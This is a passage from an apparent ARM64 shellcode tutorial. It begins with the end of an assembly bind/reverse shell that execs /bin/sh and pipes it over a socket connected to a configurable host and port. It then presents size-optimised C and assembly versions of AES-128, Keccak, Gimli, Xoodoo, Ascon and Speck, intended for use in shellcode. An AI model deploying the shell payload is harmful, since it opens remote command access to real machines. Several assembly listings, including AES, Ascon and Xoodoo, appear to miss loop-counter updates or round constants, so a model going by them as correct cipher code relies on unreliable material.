// dup3 (out[1], STDOUT_FILENO, 0);
// dup3 (in[0],  STDIN_FILENO , 0);
mov     x8, SYS_dup3
mov     x1, STDERR_FILENO + 1
ldr     w3, [sp, in0]
ldr     w4, [sp, out1]
c_dup:
subs    x1, x1, 1
// w0 = (x1 == 0) ? in[0] : out[1];
csel    w0, w3, w4, eq
svc     0
cbnz    x1, c_dup

// close pipe handles in this order..
//
// close(in[0]);
// close(in[1]);
// close(out[0]);
// close(out[1]);
mov     x1, 4*4
mov     x8, SYS_close
cls_pipe:
sub     x1, x1, 4
ldr     w0, [sp, x1]
svc     0
cbnz    x1, cls_pipe

// execve("/bin/sh", NULL, NULL);
mov     x8, SYS_execve
movq    x0, BINSH
str     x0, [sp, -16]!
mov     x0, sp
svc     0
opn_con:
// close(in[0]);
mov     x8, SYS_close
ldr     w0, [sp, in0]
svc     0

// close(out[1]);
ldr     w0, [sp, out1]
svc     0

// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
mov     x8, SYS_socket
mov     x1, SOCK_STREAM
mov     x0, AF_INET
svc     0

mov     x2, 16      // x2 = sizeof(sin)
str     w0, [sp, s] // w0 = s
.ifdef BIND
movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
str     x1, [sp, -16]!
mov     x1, sp
// bind (s, &sa, sizeof(sa));
mov     x8, SYS_bind
svc     0
cbnz    x0, cls_sck  // if(x0 != 0) goto cls_sck

// listen (s, 1);
mov     x8, SYS_listen
mov     x1, 1
ldr     w0, [sp, s]
svc     0

// accept (s, 0, 0);
mov     x8, SYS_accept
mov     x2, xzr
mov     x1, xzr
ldr     w0, [sp, s]
svc     0

ldr     w1, [sp, s]      // load binding socket
stp     w0, w1, [sp, s]
mov     x0, xzr
.else
movq    x1, ((HOST << 32) | (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET))
str     x1, [sp, -16]!
mov     x1, sp
// connect (s, &sa, sizeof(sa));
mov     x8, SYS_connect
svc     0
cbnz    x0, cls_sck      // if(x0 != 0) goto cls_sck
.endif
// efd = epoll_create1(0);
mov     x8, SYS_epoll_create1
svc     0
str     w0, [sp, efd]

ldr     w2, [sp, s]
ldr     w4, [sp, out0]
poll_init:
mov     x8, SYS_epoll_ctl
stp     x1, x2, [x3]
ldr     w0, [sp, efd]
svc     0
cmp     w2, w4
mov     w2, w4
bne     poll_init
// now loop until user exits or some other error
poll_wait:
// epoll_pwait(efd, &evts, 1, -1, NULL);
mov     x8, SYS_epoll_pwait
mov     x4, xzr              // sigmask   = NULL
mvn     x3, xzr              // timeout   = -1
mov     x2, 1                // maxevents = 1
add     x1, sp, evts         // *events   = &evts
ldr     w0, [sp, efd]        // epfd      = efd
svc     0

// if (r < 0) break;
tbnz    x0, 31, cls_efd

// if (!(evts.events & EPOLLIN)) break;
ldp     x0, x1, [sp, evts]
tbz     w0, 0, cls_efd

ldr     w3, [sp, s]
ldp     w5, w4, [sp, in1]

cmp     w1, w3

// r = (fd == s) ? s : out[0];
csel    w0, w3, w4, eq

// w = (fd == s) ? in[1] : s;
csel    w3, w5, w3, eq

mov     x2, BUFSIZ
svc     0
cbz     x0, cls_efd

// encrypt/decrypt buffer

// write(w, buf, len);
mov     x8, SYS_write
mov     w2, w0
mov     w0, w3
svc     0
b       poll_wait
cls_efd:
// epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
mov     x8, SYS_epoll_ctl
mov     x3, xzr
mov     x1, EPOLL_CTL_DEL
ldp     w0, w2, [sp, efd]
svc     0

// epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
ldr     w2, [sp, out0]
ldr     w0, [sp, efd]
svc     0

// close(efd);
mov     x8, SYS_close
ldr     w0, [sp, efd]
svc     0

// shutdown(s, SHUT_RDWR);
mov     x8, SYS_shutdown
mov     x1, SHUT_RDWR
ldr     w0, [sp, s]
svc     0
cls_sck:
// close(s);
mov     x8, SYS_close
ldr     w0, [sp, s]
svc     0

.ifdef BIND
// close(s2);
mov     x8, SYS_close
ldr     w0, [sp, s2]
svc     0
.endif
// kill(pid, SIGCHLD);
mov     x8, SYS_kill
mov     x1, SIGCHLD
ldr     w0, [sp, id]
svc     0

// close(in[1]);
mov     x8, SYS_close
ldr     w0, [sp, in1]
svc     0

// close(out[0]);
mov     x8, SYS_close
ldr     w0, [sp, out0]
svc     0

.ifdef EXIT
// exit(0);
mov     x8, SYS_exit
svc     0
.else
// deallocate stack
add     sp, sp, (ds_tbl_size & -16) + 16
ret
.endif
```

## 7. Encryption

Every one of you reading this should learn about cryptography. Yes, it’s a complex subject, but you don’t need to be a mathematician just to learn about all the various algorithms that exist. Many cryptographic algorithms intended to protect data exist, but not all of them were designed for resource constrained-environments. In this section, you’ll see a number of cryptographic algorithms that you might consider using in a shellcode at some point. The block ciphers only implement encryption. That is to say, there is no inverse function provided and therefore cannot be used with a mode like Cipher Block Chaining (CBC) mode. Encryption is all that’s required to implement Counter (CTR) mode. Moreover, it’s likely that permutation-based cryptography will eventually replace traditional types of encryption. The algorithms shown here are intentionally optimized for size rather than speed.

Also…None of the algorithms presented here are written to protect against side-channel attacks. That’s just in case anyone wants to point out a weakness. 😉

### 7.1 AES-128

A block cipher published in 1998 and originally called ‘Rijndael’ after its designers, Vincent Rijmen and Joan Daemen. Today, it’s known as the Advanced Encryption Standard (AES). I’ve included it here because AES extensions are only an optional component of ARM. The Cortex A53 that comes with the Raspberry Pi 3 does not have support for AES. This implementation along with others can be found in this Github repository.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned int W;
// Multiplication over GF(2**8)
W M(W x){
W t=x&0x80808080;
return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B w) {
B j,y,z;

if(w) {
for(z=j=0,y=1;--j;y=(!z&&y==w)?z=1:y,y^=M(y));
z=y;F(4)z^=y=(y<<1)|(y>>7);
}
return z^99;
}
void E(B *s) {
W i,w,x[8],c=1,*k=(W*)&x[4];

// copy plain text + master key to x
F(8)x[i]=((W*)s)[i];

for(;;){
// AddRoundKey, 1st part of ExpandRoundKey
w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

// AddRoundConstant, perform 2nd part of ExpandRoundKey
w=R(w,8)^c;F(4)w=k[i]^=w;

// if round 11, stop;
if(c==108)break;

// update round constant
c=M(c);

// SubBytes and ShiftRows
F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

// if not round 11, MixColumns
if(c!=108)
F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
}
}
```

The handwritten assembly results in an approx. 40% less code when compared with GNU CC, generated assembly. The use of CCMP and CSEL for the statement : `y = (!z && y == w) ? z = 1 : y;` should protect against side-channel attacks. However, as I stated at the beginning of this section, I am not a cryptographer and do not wish to make security claims on the implementations provided here. The BFXIL instruction is used to replace the low 8-bits of register input to the `SubByte` subroutine.

```// AES-128 Encryption in ARM64 assembly
// 352 bytes

.arch armv8-a
.text

.global E

// *****************************
// Multiplication over GF(2**8)
// *****************************
M:
and      w10, w14, 0x80808080
mov      w12, 27
lsr      w8, w10, 7
mul      w8, w8, w12
eor      w10, w14, w10
eor      w10, w8, w10, lsl 1
ret

// *****************************
// B SubByte(B x);
// *****************************
S:
str      lr, [sp, -16]!
ands     w7, w13, 0xFF
beq      SB2

mov      w14, 1
mov      w15, 1
mov      x3, 0xFF
SB0:
cmp      w15, 1
ccmp     w14, w7, 0, eq
csel     w14, w15, w14, eq
csel     w15, wzr, w15, eq
bl       M
eor      w14, w14, w10
subs     x3, x3, 1
bne      SB0

and      w7, w14, 0xFF
mov      x3, 4
SB1:
lsr      w10, w14, 7
orr      w14, w10, w14, lsl 1
eor      w7, w7, w14
subs     x3, x3, 1
bne      SB1
SB2:
mov      w10, 99
eor      w7, w7, w10
bfxil    w13, w7, 0, 8
ldr      lr, [sp], 16
ret

// *****************************
// void E(void *s);
// *****************************
E:
str      lr, [sp, -16]!
sub      sp, sp, 32

// copy plain text + master key to x
// F(8)x[i]=((W*)s)[i];
ldp      x5, x6, [x0]
ldp      x7, x8, [x0, 16]
stp      x5, x6, [sp]
stp      x7, x8, [sp, 16]

// c = 1
mov      w4, 1
L0:
// AddRoundKey, 1st part of ExpandRoundKey
// w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
mov      x2, xzr
ldr      w13, [sp, 16+3*4]
L1:
bl       S
ror      w13, w13, 8
ldr      w10, [sp, x2, lsl 2]
ldr      w11, [x1, x2, lsl 2]
eor      w10, w10, w11
str      w10, [x0, x2, lsl 2]

cmp      x2, 4
bne      L1

// AddRoundConstant, perform 2nd part of ExpandRoundKey
// w=R(w,8)^c;F(4)w=k[i]^=w;
eor      w13, w4, w13, ror 8
L2:
ldr      w10, [x1]
eor      w13, w13, w10
str      w13, [x1], 4

subs     x2, x2, 1
bne      L2

// if round 11, stop
// if(c==108)break;
cmp      w4, 108
beq      L5

// update round constant
// c=M(c);
mov      w14, w4
bl       M
mov      w4, w10

// SubBytes and ShiftRows
// F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
L3:
ldrb     w13, [x0, x2]
bl       S
and      w10, w2, 3
lsr      w11, w2, 2
sub      w11, w11, w10
and      w11, w11, 3
add      w10, w10, w11, lsl 2
strb     w13, [sp, w10, uxtw]

cmp      x2, 16
bne      L3

// if (c != 108)
cmp      w4, 108
L4:
beq      L0
subs     x2, x2, 4

// MixColumns
// F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
ldr      w13, [sp, x2]
eor      w14, w13, w13, ror 8
bl       M
eor      w14, w10, w13, ror 8
eor      w14, w14, w13, ror 16
eor      w14, w14, w13, ror 24
str      w14, [sp, x2]

b        L4
L5:
ldr      lr, [sp], 16
ret
```

### 7.2 KECCAK

A permutation function designed by the Keccak team (Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche).

```#define R(v,n)(((v)<<(n))|((v)>>(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

void keccak(void*p){
unsigned long long n,i,j,r,x,y,t,Y,b[5],*s=p;
unsigned char RC=1;

F(n,24){
F(i,5){b[i]=0;F(j,5)b[i]^=s[i+5*j];}
F(i,5){
t=b[(i+4)%5]^R(b[(i+1)%5],1);
F(j,5)s[i+5*j]^=t;}
t=s[1],y=r=0,x=1;
F(j,24)
r+=j+1,Y=2*x+3*y,x=y,y=Y%5,
Y=s[x+5*y],s[x+5*y]=R(t,r%64),t=Y;
F(j,5){
F(i,5)b[i]=s[i+5*j];
F(i,5)
s[i+5*j]=b[i]^(~b[(i+1)%5]&b[(i+2)%5]);}
F(j,7)
if((RC=(RC<<1)^(113*(RC>>7)))&2)
*s^=1ULL<<((1<<j)-1);
}
}
```

The following source is an example of where preprocessor directives are used to ease implementation of the original source code. This would be first processed with `CPP` using the -E option. I’ve done this so it’s easier to create Keccak-p[800, 22] assembly code for the ARM32 or ARM64 architecture if required later.

The ARM instruction set doesn’t feature a modulus instruction. Unlike the DIV or IDIV instructions on x86, UDIV and SDIV don’t calculate the remainder. The solution is to use a bitwise AND where the divisor is a power of 2 and a combination of division, multiplication and subtraction for everything else. The formula for divisors that are not a power of 2 is : `a - (n * int(a/n))`. To implement in ARM64 assembly, UDIV and MSUB are used.

```// keccak-p[1600, 24]
// 428 bytes

.arch armv8-a
.text
.global k1600

#define s x0
#define n x1
#define i x2
#define j x3
#define r x4
#define x x5
#define y x6
#define t x7
#define Y x8
#define c x9   // round constant (unsigned char)
#define d x10
#define v x11
#define u x12
#define b sp   // local buffer

k1600:
sub     sp, sp, 64
// F(n,24){
mov     n, 24
mov     c, 1                // c = 1
L0:
mov     d, 5
// F(i,5){b[i]=0;F(j,5)b[i]^=s[i+j*5];}
mov     i, 0                // i = 0
L1:
mov     j, 0                // j = 0
mov     u, 0                // u = 0
L2:
madd    v, j, d, i          // v = (j * 5) + i
ldr     v, [s, v, lsl 3]    // v = s[v]

eor     u, u, v             // u ^= v

add     j, j, 1             // j = j + 1
cmp     j, 5                // j < 5
bne     L2

str     u, [b, i, lsl 3]    // b[i] = u

add     i, i, 1             // i = i + 1
cmp     i, 5                // i < 5
bne     L1

// F(i,5){
mov     i, 0
L3:
// t=b[(i+4)%5] ^ R(b[(i+1)%5], 63);
add     v, i, 4             // v = i + 4
udiv    u, v, d             // u = (v / 5)
msub    v, u, d, v          // v = (v - (u * 5))
ldr     t, [b, v, lsl 3]    // t = b[v]

add     v, i, 1             // v = i + 1
udiv    u, v, d             // u = (v / 5)
msub    v, u, d, v          // v = (v - (u * 5))
ldr     u, [b, v, lsl 3]    // u = b[v]

eor     t, t, u, ror 63     // t ^= R(u, 63)

// F(j,5)s[i+j*5]^=t;}
mov     j, 0
L4:
madd    v, j, d, i          // v = (j * 5) + i
ldr     u, [s, v, lsl 3]    // u = s[v]
eor     u, u, t             // u ^= t
str     u, [s, v, lsl 3]    // s[v] = u

add     j, j, 1             // j = j + 1
cmp     j, 5                // j < 5
bne     L4

add     i, i, 1             // i = i + 1
cmp     i, 5                // i < 5
bne     L3

// t=s[1],y=r=0,x=1;
ldr     t, [s, 8]           // t = s[1]
mov     y, 0                // y = 0
mov     r, 0                // r = 0
mov     x, 1                // x = 1

// F(j,24)
mov     j, 0
L5:
add     j, j, 1             // j = j + 1
// r+=j+1,Y=(x*2)+(y*3),x=y,y=Y%5,
add     r, r, j             // r = r + j
add     Y, y, y, lsl 1      // Y = y * 3
add     Y, Y, x, lsl 1      // Y = Y + (x * 2)
mov     x, y                // x = y
udiv    y, Y, d             // y = (Y / 5)
msub    y, y, d, Y          // y = (Y - (y * 5))

// Y=s[x+y*5],s[x+y*5]=R(t, -(r - 64) % 64),t=Y;
madd    v, y, d, x          // v = (y * 5) + x
ldr     Y, [s, v, lsl 3]    // Y = s[v]
neg     u, r
ror     t, t, u             // t = R(t, u)
str     t, [s, v, lsl 3]    // s[v] = t
mov     t, Y

cmp     j, 24               // j < 24
bne     L5

// F(j,5){
mov     j, 0                // j = 0
L6:
// F(i,5)b[i] = s[i+j*5];
mov     i, 0                // i = 0
L7:
madd    v, j, d, i          // v = (j * 5) + i
ldr     t, [s, v, lsl 3]    // t = s[v]
str     t, [b, i, lsl 3]    // b[i] = t

add     i, i, 1             // i = i + 1
cmp     i, 5                // i < 5
bne     L7

// F(i,5)
mov     i, 0                // i = 0
L8:
// s[i+j*5] = b[i] ^ (b[(i+2)%5] & ~b[(i+1)%5]);}
add     v, i, 2             // v = i + 2
udiv    u, v, d             // u = v / 5
msub    v, u, d, v          // v = (v - (u * 5))
ldr     t, [b, v, lsl 3]    // t = b[v]

add     v, i, 1             // v = i + 1
udiv    u, v, d             // u = v / 5
msub    v, u, d, v          // v = (v - (u * 5))
ldr     u, [b, v, lsl 3]    // u = b[v]

bic     u, t, u             // u = (t & ~u)

ldr     t, [b, i, lsl 3]    // t = b[i]
eor     t, t, u             // t ^= u

madd    v, j, d, i          // v = (j * 5) + i
str     t, [s, v, lsl 3]    // s[v] = t

add     i, i, 1             // i++
cmp     i, 5                // i < 5
bne     L8

cmp     j, 5
bne     L6

// F(j,7)
mov     j, 0                // j = 0
mov     d, 113
L9:
// if((c=(c<<1)^((c>>7)*113))&2)
lsr     t, c, 7             // t = c >> 7
mul     t, t, d             // t = t * 113
eor     c, t, c, lsl 1      // c = t ^ (c << 1)
and     c, c, 255           // c = c % 256
tbz     c, 1, L10           // if (c & 2)

//   *s^=1ULL<<((1<<j)-1);
mov     v, 1                // v = 1
lsl     u, v, j             // u = v << j
sub     u, u, 1             // u = u - 1
lsl     v, v, u             // v = v << u
ldr     t, [s]              // t = s[0]
eor     t, t, v             // t ^= v
str     t, [s]              // s[0] = t
L10:
add     j, j, 1             // j = j + 1
cmp     j, 7                // j < 7
bne     L9

subs    n, n, 1             // n = n - 1
bne     L0

ret
```

### 7.3 GIMLI

A permutation function designed by Daniel J. Bernstein, Stefan Kölbl, Stefan Lucks, Pedro Maat Costa Massolino, Florian Mendel, Kashif Nawaz, Tobias Schneider, Peter Schwabe, François-Xavier Standaert, Yosuke Todo, and Benoît Viguier.

```#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)

void gimli(void*p){
unsigned int r,j,t,x,y,z,*s=p;

for(r=24;r>0;--r){
for(j=0;j<4;j++)
x=R(s[j],24),
y=R(s[4+j],9),
z=s[8+j],
s[8+j]=x^(z+z)^((y&z)*4),
s[4+j]=y^x^((x|z)*2),
s[j]=z^y^((x&y)*8);
t=r&3;
if(!t)
X(0,1),X(2,3),
*s^=0x9e377900|r;
if(t==2)X(0,2),X(1,3);
}
}
```

Thus far, I’ve only seen a hash function implemented with this algorithm. However, at the 2018 Advances in permutation-based cryptography, Benoît Viguier suggests using an Even-Mansour construction to implement a block cipher.

```
// Gimli in ARM64 assembly
// 152 bytes

.arch armv8-a
.text

.global gimli

gimli:
ldr    w8, =(0x9e377900 | 24)  // c = 0x9e377900 | 24;
L0:
mov    w7, 4                // j = 4
mov    x1, x0               // x1 = s
L1:
ldr    w2, [x1]             // x = R(s[j],  8);
ror    w2, w2, 8

ldr    w3, [x1, 16]         // y = R(s[4+j], 23);
ror    w3, w3, 23

ldr    w4, [x1, 32]         // z = s[8+j];

// s[8+j] = x^(z<<1)^((y&z)<<2);
eor    w5, w2, w4, lsl 1    // t0 = x ^ (z << 1)
and    w6, w3, w4           // t1 = y & z
eor    w5, w5, w6, lsl 2    // t0 = t0 ^ (t1 << 2)
str    w5, [x1, 32]         // s[8 + j] = t0

// s[4+j] = y^x^((x|z)<<1);
eor    w5, w3, w2           // t0 = y ^ x
orr    w6, w2, w4           // t1 = x | z
eor    w5, w5, w6, lsl 1    // t0 = t0 ^ (t1 << 1)
str    w5, [x1, 16]         // s[4+j] = t0

// s[j] = z^y^((x&y)<<3);
eor    w5, w4, w3           // t0 = z ^ y
and    w6, w2, w3           // t1 = x & y
eor    w5, w5, w6, lsl 3    // t0 = t0 ^ (t1 << 3)
str    w5, [x1], 4          // s[j] = t0, s++

subs   w7, w7, 1
bne    L1                   // j != 0

ldp    w1, w2, [x0]
ldp    w3, w4, [x0, 8]

// apply linear layer
// t0 = (r & 3);
ands   w5, w8, 3
bne    L2

// X(s[2], s[3]);
stp    w4, w3, [x0, 8]
// s[0] ^= (0x9e377900 | r);
eor    w2, w2, w8
// X(s[0], s[1]);
stp    w2, w1, [x0]
L2:
// if (t == 2)
cmp    w5, 2
bne    L3

// X(s[0], s[2]);
stp    w1, w2, [x0, 8]
// X(s[1], s[3]);
stp    w3, w4, [x0]
L3:
sub    w8, w8, 1           // r--
uxtb   w5, w8
cbnz   w5, L0              // r != 0
ret
```

### 7.4 XOODOO

A permutation function designed by the Keccak team. The cookbook includes information on implementing Authenticated Encryption (AE) and a tweakable Wide Block Cipher (WBC).

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define X(u,v)t=s[u],s[u]=s[v],s[v]=t
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void xoodoo(void*p){
W e[4],a,b,c,t,r,i,*s=p;
W x[12]={
0x058,0x038,0x3c0,0x0d0,
0x120,0x014,0x060,0x02c,
0x380,0x0f0,0x1a0,0x012};

for(r=0;r<12;r++){
F(4)
e[i]=R(s[i]^s[i+4]^s[i+8],18),
e[i]^=R(e[i],9);
F(12)
s[i]^=e[(i-1)&3];
X(7,4);X(7,5);X(7,6);
s[0]^=x[r];
F(4)
a=s[i],
b=s[i+4],
c=R(s[i+8],21),
s[i+8]=R((b&~a)^c,24),
s[i+4]=R((a&~c)^b,31),
s[i]^=c&~b;
X(8,10);X(9,11);
}
}
```

Again, this is all optimized for size rather than performance.

```
// Xoodoo in ARM64 assembly
// 268 bytes

.arch armv8-a
.text

.global xoodoo

xoodoo:
sub    sp, sp, 16          // allocate 16 bytes
mov    w9, 12               // 12 rounds
L0:
mov    w7, 0                // i = 0
mov    x1, x0
L1:
ldr    w4, [x1, 32]         // w4 = s[i+8]
ldr    w3, [x1, 16]         // w3 = s[i+4]
ldr    w2, [x1], 4          // w2 = s[i+0], advance x1 by 4

// e[i] = R(s[i] ^ s[i+4] ^ s[i+8], 18);
eor    w2, w2, w3
eor    w2, w2, w4
ror    w2, w2, 18

// e[i] ^= R(e[i], 9);
eor    w2, w2, w2, ror 9
str    w2, [sp, x7, lsl 2]  // store in e

add    w7, w7, 1            // i++
cmp    w7, 4                // i < 4
bne    L1                   //

// s[i]^= e[(i - 1) & 3];
mov    w7, 0                // i = 0
L2:
sub    w2, w7, 1
and    w2, w2, 3            // w2 = i & 3
ldr    w2, [sp, x2, lsl 2]  // w2 = e[(i - 1) & 3]
ldr    w3, [x0, x7, lsl 2]  // w3 = s[i]
eor    w3, w3, w2           // w3 ^= w2
str    w3, [x0, x7, lsl 2]  // s[i] = w3
add    w7, w7, 1            // i++
cmp    w7, 12               // i < 12
bne    L2

// Rho west
// X(s[7], s[4]);
// X(s[7], s[5]);
// X(s[7], s[6]);
ldp    w2, w3, [x0, 16]
ldp    w4, w5, [x0, 24]
stp    w5, w2, [x0, 16]
stp    w3, w4, [x0, 24]

// Iota
// s[0] ^= *rc++;
ldr    w3, [x0]            // load word
eor    w3, w3, w2          // xor
str    w3, [x0]            // store word

mov    w7, 4
mov    x1, x0
L3:
// Chi and Rho east
// a = s[i+0];
ldr    w2, [x1]

// b = s[i+4];
ldr    w3, [x1, 16]

// c = R(s[i+8], 21);
ldr    w4, [x1, 32]
ror    w4, w4, 21

// s[i+8] = R((b & ~a) ^ c, 24);
bic    w5, w3, w2
eor    w5, w5, w4
ror    w5, w5, 24
str    w5, [x1, 32]

// s[i+4] = R((a & ~c) ^ b, 31);
bic    w5, w2, w4
eor    w5, w5, w3
ror    w5, w5, 31
str    w5, [x1, 16]

// s[i+0]^= c & ~b;
bic    w5, w4, w3
eor    w5, w5, w2
str    w5, [x1], 4

// i--
subs   w7, w7, 1
bne    L3

// X(s[8], s[10]);
// X(s[9], s[11]);
ldp    w2, w3, [x0, 32] // 8, 9
ldp    w4, w5, [x0, 40] // 10, 11
stp    w2, w3, [x0, 40]
stp    w4, w5, [x0, 32]

subs   w9, w9, 1           // r--
bne    L0                  // r != 0

// release stack
ret
// round constants
rc:
.hword 0x058, 0x038, 0x3c0, 0x0d0
.hword 0x120, 0x014, 0x060, 0x02c
.hword 0x380, 0x0f0, 0x1a0, 0x012

```

### 7.5 ASCON

A permutation function designed by Christoph Dobraunig, Maria Eichlseder, Florian Mendel and Martin Schläffer. Ascon uses a sponge-based mode of operation. The recommended key, tag and nonce length is 128 bits. The sponge operates on a state of 320 bits, with injected message blocks of 64 or 128 bits. The core permutation iteratively applies an SPN-based round transformation with a 5-bit S-box and a lightweight linear layer.

Ascon website

```#define R(x,n)(((x)>>(n))|((x)<<(64-(n))))
typedef unsigned long long W;

void ascon(void*p) {
int i;
W   t0,t1,t2,t3,t4,x0,x1,x2,x3,x4,*s=(W*)p;

x0=s[0];x1=s[1];x2=s[2];x3=s[3];x4=s[4];
// apply 12 rounds
for(i=0;i<12;i++) {
x2^=((0xFULL-i)<<4)|i;
// apply non-linear layer
x0^=x4;x4^=x3;x2^=x1;
t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
x1^=x0;x0^=x4;x3^=x2;x2=~x2;
// apply linear diffusion layer
x0^=R(x0,19)^R(x0,28);x1^=R(x1,61)^R(x1,39);
x2^=R(x2,1)^R(x2,6);x3^=R(x3,10)^R(x3,17);
x4^=R(x4,7)^R(x4,41);
}
// save 320-bit state
s[0]=x0;s[1]=x1;s[2]=x2;s[3]=x3;s[4]=x4;
}
```

This algorithm works really well on the ARM64 architecture. Very simple operations.

```
// ASCON in ARM64 assembly
// 192 bytes

.arch armv8-a
.text

.global ascon

ascon:
mov    x10, x0
ldp    x0, x1, [x10]
ldp    x2, x3, [x10, 16]
ldr    x4, [x10, 32]

// apply 12 rounds
mov    x11, xzr
L0:
// x2^=((0xFULL-i)<<4)|i;
mov    x12, 0xF
sub    x12, x12, x11
orr    x12, x11, x12, lsl 4
eor    x2, x2, x12

// apply non-linear layer
// x0^=x4;x4^=x3;x2^=x1;
eor    x0, x0, x4
eor    x4, x4, x3
eor    x2, x2, x1

// t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
bic    x5, x1, x0
bic    x6, x2, x1
bic    x7, x3, x2
bic    x8, x4, x3
bic    x9, x0, x4

// x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
eor    x0, x0, x6
eor    x1, x1, x7
eor    x2, x2, x8
eor    x3, x3, x9
eor    x4, x4, x5

// x1^=x0;x0^=x4;x3^=x2;x2=~x2;
eor    x1, x1, x0
eor    x0, x0, x4
eor    x3, x3, x2
mvn    x2, x2

// apply linear diffusion layer
// x0^=R(x0,19)^R(x0,28);
ror    x5, x0, 19
eor    x5, x5, x0, ror 28
eor    x0, x0, x5

// x1^=R(x1,61)^R(x1,39);
ror    x5, x1, 61
eor    x5, x5, x1, ror 39
eor    x1, x1, x5

// x2^=R(x2,1)^R(x2,6);
ror    x5, x2, 1
eor    x5, x5, x2, ror 6
eor    x2, x2, x5

// x3^=R(x3,10)^R(x3,17);
ror    x5, x3, 10
eor    x5, x5, x3, ror 17
eor    x3, x3, x5

// x4^=R(x4,7)^R(x4,41);
ror    x5, x4, 7
eor    x5, x5, x4, ror 41
eor    x4, x4, x5

// i++
// i < 12
cmp    x11, 12
bne    L0

// save 320-bit state
stp    x0, x1, [x10]
stp    x2, x3, [x10, 16]
str    x4, [x10, 32]
ret
```

### 7.6 SPECK

A block cipher from the NSA that was intended to make its way into IoT devices. Designed by Ray Beaulieu, Douglas Shors, Jason Smith, Stefan Treatman-Clark, Bryan Weeks and Louis Wingers.

The SIMON and SPECK Families of Lightweight Block Ciphers

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void speck(void*mk,void*p){
W k[4],*x=p,i,t;

F(4)k[i]=((W*)mk)[i];

F(27)
*x=(R(*x,8)+x[1])^*k,
x[1]=R(x[1],29)^*x,
t=k[3],
k[3]=(R(k[1],8)+*k)^i,
*k=R(*k,29)^k[3],
k[1]=k[2],k[2]=t;
}
```

SPECK has been surrounded by controversy since the NSA proposed including it in the ISO/IEC 29192-2 portfolio, however, they are still useful for shellcodes.

```// SPECK64/128 in ARM64 assembly
// 80 bytes

.arch armv8-a
.text

.global speck64

// speck64(void*mk, void*data);
speck64:
// k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
ldp    w5, w6, [x0]
ldp    w7, w8, [x0, 8]
ldp    w2, w4, [x1]         // x0 = x[0]; x1 = k[1];
mov    w3, wzr              // i=0
L0:
ror    w2, w2, 8
add    w2, w2, w4           // x0 = (R(x0, 8) + x1) ^ k0;
eor    w2, w2, w5           //
eor    w4, w2, w4, ror 29   // x1 = R(x1, 3) ^ x0;
mov    w9, w8               // backup k3
ror    w6, w6, 8
add    w8, w5, w6           // k3 = (R(k1, 8) + k0) ^ i;
eor    w8, w8, w3           //
eor    w5, w8, w5, ror 29   // k0 = R(k0, 3) ^ k3;
mov    w6, w7               // k1 = k2;
mov    w7, w9               // k2 = t;
add    w3, w3, 1            // i++;
cmp    w3, 27               // i < 27;
bne    L0

// save result
stp    w2, w4, [x1]         // x[0] = x0; x[1] = x1;
ret
```

Since there isn’t a huge difference between the two variants, here’s the 128/256 version that works best on 64-bit architectures.

```#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned long long W;

void speck128(void*mk,void*p){
W k[4],*x=p,i,t;

F(4)k[i]=((W*)mk)[i];

F(34)
x[1]=(R(x[1],8)+*x)^*k,
*x=R(*x,61)^x[1],
t=k[3],
k[3]=(R(k[1],8)+*k)^i,
*k=R(*k,61)^k[3],
k[1]=k[2],k[2]=t;
}
```

Again, the assembly is almost exactly the same.

```
// SPECK128/256 in ARM64 assembly
// 80 bytes

.arch armv8-a
.text

.global speck128

// speck128(void*mk, void*data);
speck128:
// k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
ldp    x5, x6, [x0]
ldp    x7, x8, [x0, 16]
ldp    x2, x4, [x1]         // x0 = x[0]; x1 = k[1];
mov    x3, xzr              // i=0
L0:
ror    x4, x4, 8
add    x4, x4, x2           // x1 = (R(x1, 8) + x0) ^ k0;
eor    x4, x4, x5           //
eor    x2, x4, x2, ror 61   // x0 = R(x0, 61) ^ x1;
mov    x9, x8               // backup k3
ror    x6, x6, 8
add    x8, x5, x6           // k3 = (R(k1, 8) + k0) ^ i;
eor    x8, x8, x3           //
eor    x5, x8, x5, ror 61   // k0 = R(k0, 61) ^ k3;
mov    x6, x7               // k1 = k2;
mov    x7, x9               // k2 = t;
add    x3, x3, 1            // i++;
cmp    x3, 34               // i < 34;
bne    L0

// save result
stp    x2, x4, [x1]         // x[0] = x0; x[1] = x1;
ret
```

The designs are nice, but independent cryptographers suggest there may be weaknesses in these ciphers that only the NSA know about.

### 7.7 SIMECK

A block cipher designed by Gangqiang Yang, Bo Zhu, Valentin Suder, Mark D. Aagaard, and Guang Gong was published in 2015. According to the authors, SIMECK combines the good design components of both SIMON and SPECK, in order to devise more compact and efficient block ciphers.

